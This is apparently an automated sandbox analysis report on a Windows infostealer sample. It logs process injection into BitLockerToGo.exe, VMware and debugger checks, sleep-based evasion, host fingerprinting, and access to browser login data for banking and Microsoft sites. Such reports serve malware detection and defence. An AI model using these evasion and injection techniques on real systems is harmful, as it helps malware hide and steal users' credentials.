Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -30101s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6448 Thread sleep time: -699000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -455961s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 6448 Thread sleep time: -1599000s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5728 Thread sleep time: -8384223s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2832 Thread sleep count: 9995 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe TID: 2832 Thread sleep time: -2248875s >= -30000s
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F449B0 GetSystemTime followed by cmp: cmp eax, 04h and CTI: jc 02F449F1h 3_2_02F449B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6000 CreateDirectoryA,FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02EC6000
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE6770 CreateDirectoryA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,GetLastError,SetFileAttributesA,GetLastError,RemoveDirectoryA,GetLastError,GetLastError,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 3_2_02EE6770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E31F9C FindClose,FindFirstFileExW,GetLastError, 3_2_02E31F9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E93F40 SHGetFolderPathA,FindFirstFileA,FindNextFileA,FindClose,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CreateDirectoryA,CreateDirectoryA,CopyFileA,CopyFileA, 3_2_02E93F40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E32022 GetLastError,GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 3_2_02E32022
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E938D0 FindFirstFileA,FindNextFileA,GetLastError,FindClose, 3_2_02E938D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EDFF00 CreateDirectoryA,FindFirstFileA,CreateDirectoryA,CopyFileA,FindNextFileA,FindClose,GetLastError,GetLastError, 3_2_02EDFF00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E4FC2F FindFirstFileExW, 3_2_02E4FC2F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Thread delayed: delay time: 30101
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CT service, encrypted_token FROM token_servicerr global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Ven_VMware&P
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: discord.comVMware20,11696487552f
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: r global passwords blocklistVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ra Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696487
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: formVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4564079502.00000000074D5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}iG8
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: global block list test formVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BitLockerToGo.exe, 00000003.00000003.2268651425.000000000317E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.00000000074C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+`_
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: AMC password management pageVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pageformVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rootpagecomVMware20,11696487552o
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.000000000312F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: BitLockerToGo.exe, 00000003.00000002.4564844029.000000000754A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}r
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000002.4564844029.000000000754A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}dowsApp
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tive Brokers - non-EU EuropeVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2325297122.00000000074E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: inGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwoUAFmVChtHrzZUujZX
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,1169648755
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9135C559
Source: BitLockerToGo.exe, 00000003.00000003.3323528014.000000000751F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}S
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BitLockerToGo.exe, 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_9135C559V
Source: BitLockerToGo.exe, 00000003.00000003.2268651425.0000000003176000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,116
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696p
Source: BitLockerToGo.exe, 00000003.00000002.4555474593.00000000031A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
Source: file.exe, 00000000.00000002.2266690405.000001913B593000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comVMware20,11696487552o
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: o.inVMware20,11696487552~
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: outlook.office.comVMware20,11696487552s
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: HARtive Brokers - non-EU EuropeVMware20,11696487552
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: BitLockerToGo.exe, 00000003.00000003.2328545556.00000000074F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ccount.microsoft.com/profileVMware20,11696487552u
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: Wfn1uIfP6NkqWeb Data.3.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process information queried: ProcessInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED6280 IsDebuggerPresent, 3_2_02ED6280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 CreateThread,FindCloseChangeNotification,Sleep,GetTempPathA,CreateDirectoryA,CreateDirectoryA,CreateDirectoryA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,OutputDebugStringA,CreateMutexA,GetLastError,Sleep,Sleep,Sleep,Sleep,shutdown,closesocket,Sleep, 3_2_02E5A102
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C00045CF00 mov eax, dword ptr fs:[00000030h] 0_2_000000C00045CF00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000492F60 mov eax, dword ptr fs:[00000030h] 0_2_000000C000492F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C0004C6180 mov eax, dword ptr fs:[00000030h] 0_2_000000C0004C6180
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 mov eax, dword ptr fs:[00000030h] 3_2_02E5A102
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A102 mov ecx, dword ptr fs:[00000030h] 3_2_02E5A102
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC86C0 mov eax, dword ptr fs:[00000030h] 3_2_02EC86C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5A6B7 mov eax, dword ptr fs:[00000030h] 3_2_02E5A6B7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3070 mov ecx, dword ptr fs:[00000030h] 3_2_02ED3070
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E95790 mov eax, dword ptr fs:[00000030h] 3_2_02E95790
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov eax, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E595B8 mov ecx, dword ptr fs:[00000030h] 3_2_02E595B8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E5DB00 mov eax, dword ptr fs:[00000030h] 3_2_02E5DB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED6280 mov eax, dword ptr fs:[00000030h] 3_2_02ED6280
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECA6B3 mov eax, dword ptr fs:[00000030h] 3_2_02ECA6B3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECA502 mov eax, dword ptr fs:[00000030h] 3_2_02ECA502
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8E09 mov eax, dword ptr fs:[00000030h] 3_2_02EC8E09
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC8C58 mov eax, dword ptr fs:[00000030h] 3_2_02EC8C58
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC6D80 mov eax, dword ptr fs:[00000030h] 3_2_02EC6D80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9213 mov eax, dword ptr fs:[00000030h] 3_2_02EC9213
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC93CB mov eax, dword ptr fs:[00000030h] 3_2_02EC93CB
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECB30F mov eax, dword ptr fs:[00000030h] 3_2_02ECB30F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECB15E mov eax, dword ptr fs:[00000030h] 3_2_02ECB15E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ED3600 mov eax, dword ptr fs:[00000030h] 3_2_02ED3600
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9B4B mov eax, dword ptr fs:[00000030h] 3_2_02EC9B4B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EC9CFC mov eax, dword ptr fs:[00000030h] 3_2_02EC9CFC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EEEA40 CharNextA,CharNextA,CharNextA,CharNextA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrlenA,GetProcessHeap,GetProcessHeap,HeapAlloc,lstrcpynA,GetProcessHeap,HeapFree, 3_2_02EEEA40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E34311 SetUnhandledExceptionFilter, 3_2_02E34311
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E34184 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02E34184
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E3451D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_02E3451D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02E38A64 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_02E38A64

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000 protect: page execute and read and write
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02ECF280 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAllocEx,LoadLibraryA,GetProcAddress,WriteProcessMemory,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject, 3_2_02ECF280
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000 value starts with: 4D5A
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E00000
Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2D3B008
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Process created: C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe "C:\Users\user\AppData\Local\Temp\spanCPXDj512V5iG\KSExO5GhJ2KIj6jiDKtz.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_000000C000433185 cpuid 0_2_000000C000433185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 3_2_02E52B5A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52EEC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52E06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_02E52F77
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E52D5F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_02E532F3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E533F9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E531CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E4B1B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E4B734
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_02E534CF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoEx,FormatMessageA, 3_2_02E31D94
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation
